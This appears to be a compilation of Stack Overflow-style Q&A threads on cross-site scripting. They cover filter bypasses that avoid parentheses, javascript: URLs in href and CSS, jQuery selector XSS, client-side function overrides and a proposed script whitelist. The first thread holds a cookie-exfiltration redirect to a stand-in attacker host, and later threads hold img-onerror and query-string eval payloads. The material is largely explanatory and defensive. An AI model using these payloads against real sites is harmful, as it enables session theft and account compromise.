JavaScript alert without parentheses - javascript

I have found a Cross-Site Scripting vulnerability in a client's application.
The problem is that the vulnerable parameter does not accept parentheses, so something like alert(document.cookie) is rejected because of the parentheses.
I can get XSS using alert`xss`.
I have also tried the code below, but it failed as well; the site kept reloading for a long time, so I think it was rejected:
window.onerror=eval;throw '=1;alert\u0028document.location\u0029'
I also tried the suggestions from the linked question "parentheses alternatives in JS, if any?",
but I failed.
Are there any alternatives?
Thank you.

Is there a reason that an alert is necessary? I understand that it is common for demonstrating a proof of concept, but would simply having a redirect be sufficient?
For example:
document.location="https://example.com?cookie="+document.cookie
It's important for pentesters to remember that XSS is not actually about popping alert boxes, but about executing arbitrary JavaScript. What would a real attacker do with the access your XSS allows?
Imagine setting up an identical site on a domain similar to your client's and redirecting the user there... except now you don't need XSS and can log keystrokes, ask them to download files, attempt browser exploits, etc.
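To tie the two together, here is a minimal sketch of payloads that avoid parentheses entirely (the collector domain is made up for illustration): backticks invoke a function as a tagged template literal, and assigning to document.location needs no function call at all.
// Tagged template literal: calls alert without "(" or ")"
alert`xss`;
// Redirect-based exfiltration, also parenthesis-free; attacker.example is hypothetical
document.location = "https://attacker.example/?c=" + document.cookie;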

Related

XSS - Is it possible to sanitise user input by removing "<"?

On the front-end, is it possible to catch all XSS attacks by removing < from user content? This seems like a simple way to disable malicious code, and currently I have no use cases that would require < to be preserved. Will this work in all cases?
The way I would display user content would always be as inner html, e.g.
<div>{USER CONTENT}</div>
It depends on where you use the user input.
If you use it inside an a href= attribute, then, well: no!
<a href="{{linkFromUser}}">
and then that could be javascript:alert('oh no');
and a browser will execute it if the link is pressed, in the context of your page.
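To make that concrete, here is a minimal sketch (the element id and the filtering code are illustrative, not from the original post): a payload with no < in it at all survives the filter and still executes when it ends up in an href.
var userInput = "javascript:alert(document.cookie)";    // no "<" anywhere
var stripped = userInput.replace(/</g, "");              // the filter removes nothing
document.getElementById("profileLink").href = stripped;  // clicking the link now runs the script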
To clarify, the answer is in a comment of the accepted answer.
Lux kindly linked a document confirming that a similar approach of entity-encoding < is enough to prevent scripts running inside inner HTML content (which pretty much answers my question). However, & also needs to be encoded, and the UTF-7 XSS charset issue should be avoided (apparently).
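For reference, a minimal sketch of that encoding step (the helper name is an illustrative choice): encoding &, <, and quotes covers both inner HTML content and quoted attribute values.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;")
          .replace(/</g, "&lt;")
          .replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;")
          .replace(/'/g, "&#39;");
}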

Do or did javascript: URLs ever work in CSS, and if so, can it be prevented?

So I saw a code snippet today and was horrified:
<p style='background-image: url("javascript:alert(&apos;foo&apos;);");'>Hello</p>
Is it possible to execute JavaScript from within CSS this way? (It didn't work when I tested it on a clean Firefox profile, but maybe I made some stupid mistake here and the concept does work.)
If so, what means are there to prevent this, either with an HTTP header or by declarations made by the HTML itself (e.g. when sourcing CSS files from another server)?
If not, was this never possible or has this changed?
The current CSS spec says only "valid image formats" can be used in a background-image:
In some cases, an image is invalid, such as a ‘<url>’ pointing to a resource that is not a valid image format. An invalid image is rendered as a solid-color ‘transparent’ image with no intrinsic dimensions. [...] If the UA cannot download, parse, or otherwise successfully display the contents at the URL as an image, it must be treated as an invalid image.
The spec is silent on whether or not a javascript: url that returns valid image data would work -- it'd be an interesting exercise to try to construct one! -- but I'd be pretty darn surprised if it did.
User agents may vary in how they handle invalid URIs or URIs that designate unavailable or inapplicable resources.
(As @Kaiido points out below, scripts within SVG will not run in this situation either, so I'd expect the whole javascript: protocol to be treated as an "inapplicable resource".)
IE supports CSS expressions:
width:expression(document.body.clientWidth > 955 ? "955px": "100%" );
but they are not standard and are not portable across browsers. Avoid them if possible. They have been deprecated since IE8.
Yes, in the past this attack vector worked (older browsers like IE6). I believe most modern browsers should protect against this kind of attack. That said, there can always be more complicated attacks that may get around current protections. If you are including any user-generated content anywhere, it is best to sanitize it before injecting it into your site.
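On the prevention side of the question, here is a hedged sketch of a header-based mitigation (Express-style middleware; the directive values are illustrative): a Content-Security-Policy that limits styles and scripts to the same origin also rules out javascript: URLs, since they are never an allowed source.
// Illustrative Express middleware: send a restrictive CSP with every response
app.use(function (req, res, next) {
  res.setHeader(
    "Content-Security-Policy",
    "default-src 'self'; style-src 'self'; script-src 'self'"
  );
  next();
});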
It's possible to execute JavaScript where a URI is expected by prefixing it with javascript:. This is, in fact, how bookmarklets work. I don't think, however, that this would work with CSS url(), but it does with href or window.location.
<a href="javascript:alert('foo')">say foo</a>
I think whoever wrote that bit of code was confused about it.

Selector interpreted as HTML on my website. Can an attacker easily exploit this?

I have a website that is only accessible via https.
It does not load any content from other sources. So all content is on the local webserver.
Using the Retire.js Chrome plugin I get a warning that the jQuery 1.8.3 I included is vulnerable to 'Selector interpreted as HTML'
(jQuery bug 11290)
I am trying to push for a quick upgrade, but I need some more concrete information to justify the upgrade to the powers that be.
My questions are:
Given the above, should I be worried?
Can this result in an XSS-type attack?
What the bug is telling you is that jQuery may mis-identify a selector containing a < as being an HTML fragment instead, and try to parse and create the relevant elements.
So the vulnerability, such as it is, is that a cleverly-crafted selector, if then passed into jQuery, could define a script tag that then executes arbitrary script code in the context of the page, potentially taking private information from the page and sending it to someone with malicious (or merely prurient) intent.
This is largely only useful if User A can write a selector that will later be given to jQuery in User B's session, letting User A steal information from User B's page. (It really doesn't matter if a user can "trick" jQuery this way on their own page; they can do far worse things from the console, or with "save as".)
So: if nothing in your code lets users provide selectors that will be saved and then retrieved by other users and passed to jQuery, I wouldn't be all that worried. If it does (with or without the fix to the bug), I'd examine those selector strings really carefully. I say "with or without the fix" because if you didn't filter what the users typed at all, they could still just provide an HTML fragment where the first non-whitespace character is <, which would still cause jQuery to parse it as an HTML fragment.
As the author of Retire.js let me shed some light on this. There are two weaknesses in older versions of jQuery, but those are not vulnerabilities by themselves. It depends on how jQuery is used. Two examples abusing the bugs are shown here: research.insecurelabs.org/jquery/test/
The two examples are:
$("#<img src=x onerror=...>")
and
$("element[attribute='<img src=x onerror=...>'")
Typically this becomes a problem if you do something like:
$(location.hash)
This was a fairly common pattern on many web sites when single-page web sites started to appear.
So this becomes a problem if and only if you put untrusted user data inside the jQuery selector function.
And yes, the end result is XSS if the site is in fact vulnerable. HTTPS will not protect you against these kinds of flaws.
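A minimal sketch of the pattern both answers describe (the validation regex is just one illustrative fix): only pass untrusted strings to $() after making sure they can only be a plain selector.
// Vulnerable on older jQuery: the fragment is attacker-controlled,
// e.g. https://example.com/#<img src=x onerror=alert(1)>
$(location.hash);
// Safer: only accept simple id selectors before handing them to jQuery
var hash = location.hash;
if (/^#[A-Za-z][\w-]*$/.test(hash)) {
  $(hash).show();
}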

Degrees of JS vulnerability

Never trust the client. It's my coding mantra. All javascript can, with enough effort, be overwritten or compromised. The thing I want to understand is how.
Let's say I wrote a function checkStep() for a game - each time the player moves one space, it polls the server to check for any events: HP regeneration, enter random battle, move to next map, etc. I asked myself "self, how would I go about rewriting or disabling this function?" Research turned up some conflicting results. Some sources say functions can be directly redefined from the console, others say it would be a much more involved process.
My question is this: what would a player have to do to rewrite or disable my checkStep() function? Can they simply redefine it from the console? Would they have to rip, modify, and re-host my code? How would you do it?
Please note, I'm not asking how to make this function secure.
The first person to leave an answer/comment along the lines of "you can try minifying it, but it still won't be secure" or "put in some server-side checks" is getting bludgeoned with a semicolon, as an example to the rest.
You could use a web debugging proxy like Fiddler to do this for your local machine. Programs like this allow you to intercept content you download and fiddle with it. So you could write a new version of the function, then use the program to replace it with your version when the file is downloaded from the server. Then, for your local machine, the code would run with the new function in place. The web session manipulation page on the Fiddler site has a few more details.
There is no reason to use any JavaScript, or even a browser.
If a normal user can use their browser to play the game then any user can use any program to communicate with the server and send it anything they want. The server is not able to know if someone is using a browser to connect to it or not.
This applies to anything. A game server doesn't know if the user is connecting to it through the official game client. Since the official game is closed source it would be easy to fall into trusting it even though it is possible to reverse engineer the protocols used and use anything to connect to the server.
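As a minimal sketch of that point (the endpoint and payload are made up): any HTTP client can send exactly the request the game's own JavaScript would send, and the server has no way to tell the difference.
// Hypothetical move request; nothing here requires a browser or the official client
fetch("https://game.example/api/move", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ player: 42, step: { x: 1, y: 0 } })
});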
Complex things like creating a malicious game client, or using a proxy to alter content before it reaches the browser, are technically valid points; however, that seems like a lot of effort for something that is very simple to do.
var checkStep = function() {
  // ... your original function
};

// later on
checkStep = function() {
  alert('foo');
};
It is perfectly valid in JavaScript to change what function a variable holds. Any function you define can be redefined on the client side. This can be done by other script files loaded by the browser which use conflicting variable names, scripts injected via XSS, or by the user bringing up the console.

Would this be a good idea against XSS?

As it isn't really popular to use the Origin / X-Frame-Options HTTP headers, and I don't think the new CSP in Firefox would be much better (overhead, complexity, etc.), I want to make a proposal for a new JavaScript / ECMA version.
But first I'm publishing the idea so you can say whether it's bad. I call it simply jsPolicy:
Everyone who uses JavaScript has placed scripts in the HTML head, so why don't we use them to add our policies there and control all of the scripts that follow? Example:
<html>
<head>
  <title>Example</title>
  <script>
    window.policy.inner = ["\nfunction foo(bar) {\n return bar;\n}\n", "foo(this);"];
  </script>
</head>
<body>
  <script>
    function foo(bar) {
      return bar;
    }
  </script>
  <a href="#" onclick="foo(this);">Click Me</a>
  <script>
    alert('XSS');
  </script>
</body>
</html>
Now the browser compares each <script>'s innerHTML and the onclick value with the ones in the policy, and so the last script block is not executed (it is ignored).
Of course it wouldn't be practical to duplicate all the inline code, so we use checksums instead. Example:
crc32("\nfunction foo(bar) {\n return bar;\n}\n");
results "1077388790"
And now the full example:
if (typeof window.policy != 'undefined') {
  window.policy.inner = ["1077388790", "2501246156"];
  window.policy.url = ["http://code.jquery.com/jquery*.js", "http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"];
  window.policy.relative = ["js/*.js"];
  window.policy.report = ["api/xssreport.php"];
}
The browser only needs to check whether the checksum of an inline script is listed in policy.inner, or whether the script.src URL matches policy.url.
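As a rough sketch of the check being proposed (this would live inside the engine, not in page code; crc32 and urlMatches are assumed helper functions):
function isScriptAllowed(scriptNode, policy) {
  if (scriptNode.src) {
    // External script: its URL must match one of the policy.url patterns
    return policy.url !== false &&
           policy.url.some(function (pattern) { return urlMatches(scriptNode.src, pattern); });
  }
  // Inline script: its checksum must be whitelisted in policy.inner
  return policy.inner !== false &&
         policy.inner.indexOf(String(crc32(scriptNode.innerHTML))) !== -1;
}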
Note: The idea behind policy.relative is to allow local scripts only:
window.policy.url = false;
window.policy.relative = ["js/*.js"];
Note: policy.report should work nearly the same way as in CSP (it sends blocked scripts and URLs to an API):
https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-unofficial-draft-20110315.html#violation-report-syntax
Important:
The policy can't be set twice (else it throws a warning), i.e. it behaves like a constant
To think about: The policy can only be set in the head (else it throws a warning)
The policy is only used to check the scripts that are part of the HTML source, not those that are added on the fly. Example:
document.write('<script src="http://code.jquery.com/jquery-1.5.2.min.js"></scr' + 'ipt>');
You don't need a policy.url definition for "http://code.jquery.com..." as the policy.inner checksum validates the complete script source. This means the source is loaded even if policy.url is set to false (yes, it's still secure!). This guarantees simple usage of the policy.
If one of the policies is missing, there is no limitation. This means that an empty policy.relative results in all local files being allowed. This guarantees backward compatibility.
If one of the policies is set to false, no usage is allowed (the default is true). Example:
policy.inner = false;
This disallows any inline scripting
The policy only ignores disallowed scripts and throws a warning to the console (an error would stop the execution of allowed scripts and this isn't needed)
I think this would make XSS impossible, and as a replacement for CSP it would prevent persistent XSS as well (as long as nobody overwrites the policy), and it would be much easier to update.
What do you think?
EDIT:
Here is an example made in Javascript:
http://www.programmierer-forum.de/php/js-policy-against-xss.php
Of course we can't control the script execution, but it shows how it could work if a jsPolicy-compatible browser existed.
EDIT2:
Don't think I'm talking about coding a little JavaScript function to detect XSS! My jsPolicy idea would have to be part of a new JavaScript engine. You can compare it to a PHP setting placed in the .htaccess file: you cannot change that setting at runtime. The same requirement applies to jsPolicy. You can call it a global setting.
jsPolicy in short words:
HTML parser -> sends scripts to the JavaScript engine -> compares them with jsPolicy -> are they allowed?
A) yes: they are executed by the JavaScript engine
B) no: they are ignored and a report is sent to the webmaster
EDIT3:
Referring to Mike's comment, this would be a possible setting, too:
window.policy.eval = false;
Cross-site scripting occurs on the client-side. Your policies are defined on the client-side. See the problem?
I like Content Security Policy, and I use it on all of my projects. In fact, I am working on a JavaScript framework, which has one of its requirements "be CSP-friendly."
CSP > crossdomain.xml > your policy.
The vast majority of XSS attacks come from "trusted" sources, at least as far as the browser is concerned. They are usually the result of echoing user input, e.g. in a forum, without properly escaping it. You're never going to get an XSS from linking to jQuery, and it is extremely rare that you will from any other linked source.
In the case where you are trying to do cross-domain scripting, you can't get a checksum of the remote script.
So although your idea seems fine, I don't really see a point to it.
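A minimal sketch of the "echoed user input" case described above (Express-style, names illustrative): the query parameter is reflected into the page without escaping, so a crafted link runs script in the victim's browser regardless of any client-side policy.
// Reflected XSS: ?q=<script>...</script> ends up executing in the response page
app.get("/search", function (req, res) {
  res.send("<p>Results for: " + req.query.q + "</p>"); // unescaped reflection
});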
This idea keeps getting floated and re-floated every so often... and each time security experts debunk it.
Don't mean to sound harsh, but this is not a development problem, it is a security problem. Specifically, most developers don't realize how many variants, vectors, exploits and evasion techniques there are.
As some of the other answers here mentioned, the problem is that your solution does not solve the problem, of whether or not to trust whatever arrives at the browser, since on the client side you have no way of knowing what is code, and what is data. Even your solution does not prevent this.
See e.g. this question on ITsec.SE for some of the practical issues with implementing this.
(your question is kinda a duplicate of that one, more or less... )
Btw, re CSP - check this other question on ITsec.SE.
The policy is only used to check the scripts that are part of the HTML source, not those that are added on the fly. Example:
document.write('<script src="http://code.jquery.com/jquery-1.5.2.min.js"></scr' + 'ipt>');
You don't need a policy.url definition for "http://code.jquery.com..." as the policy.inner checksum validates the complete script source. This means the source is loaded even if policy.url is set to false (yes, it's still secure!). This guarantees simple usage of the policy.
It seems like you've given the whole game away here.
If I have code like
// Pull parameters out of query string.
var match = location.search.match(/[&?]([^&=]+)=([^&]*)/);
window[decodeURIComponent(match[1])](decodeURIComponent(match[2]));
and someone tricks a user into visiting my site with the query string ?eval=alert%28%22pwned%22%29 then they've been XSSed, and your policy has done nothing to stop it.
